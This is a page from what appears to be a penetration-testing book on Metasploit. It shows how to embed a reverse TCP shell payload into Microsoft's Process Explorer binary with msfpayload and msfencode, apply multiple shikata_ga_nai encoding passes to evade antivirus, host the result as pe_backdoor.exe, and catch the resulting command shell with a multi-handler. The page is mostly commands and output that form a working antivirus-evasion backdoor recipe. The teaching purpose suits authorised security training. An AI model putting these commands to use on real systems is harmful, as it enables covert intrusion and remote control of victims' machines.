Avoiding Detection
105
Custom Executable Templates
Typically, when
msfencode
is run, the payload is embedded into the default
executable template at
data/templates/template.exe
. Although this template is
changed on occasion, antivirus vendors still look for it when building signa-
tures. However,
msfencode
now supports the use of any Windows executable
in place of the default executable template via the
-x
option. In the follow-
ing example, we encode our payload again using the Process Explorer from
Microsoft’s Sysinternals Suite as a custom-executable template.
root@bt:/opt/framework3/msf3#
wget http://download.sysinternals.com/Files/
ProcessExplorer.zip
. . . SNIP . . .
2011-03-21 17:14:46 (119 KB/s) - 'ProcessExplorer.zip' saved [1615732/1615732]
root@bt:/opt/framework3/msf3#
cd work/
root@bt:/opt/framework3/msf3/work#
unzip ../ProcessExplorer.zip
Archive: ../ProcessExplorer.zip
inflating: procexp.chm
inflating: procexp.exe
inflating: Eula.txt
root@bt:/opt/framework3/msf3/work#
cd ..
root@bt:/opt/framework3/msf3#
msfpayload windows/shell_reverse_tcp
LHOST=192.168.1.101 LPORT=8080 R | msfencode -t exe -x work/procexp.exe
-o /var/www/pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=5)
As you can see, at we download Process Explorer from Microsoft
then unzip it at . Then at we use the
-x
switch to specify the downloaded
Process Explorer binary for use as our custom template. After encoding com-
pletes, we start up the multi-handler through
msfcli
to listen for the incoming
connection, as shown here:
root@bt:/opt/framework3/msf3#
msfcli exploit/multi/handler PAYLOAD=windows/
shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.101:8080
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.101:8080 -> 192.168.1.195:1191)
C:\Documents and Settings\Administrator\My Documents\Downloads>
And voilĂ : We have successfully opened a shell without being detected by
antivirus software.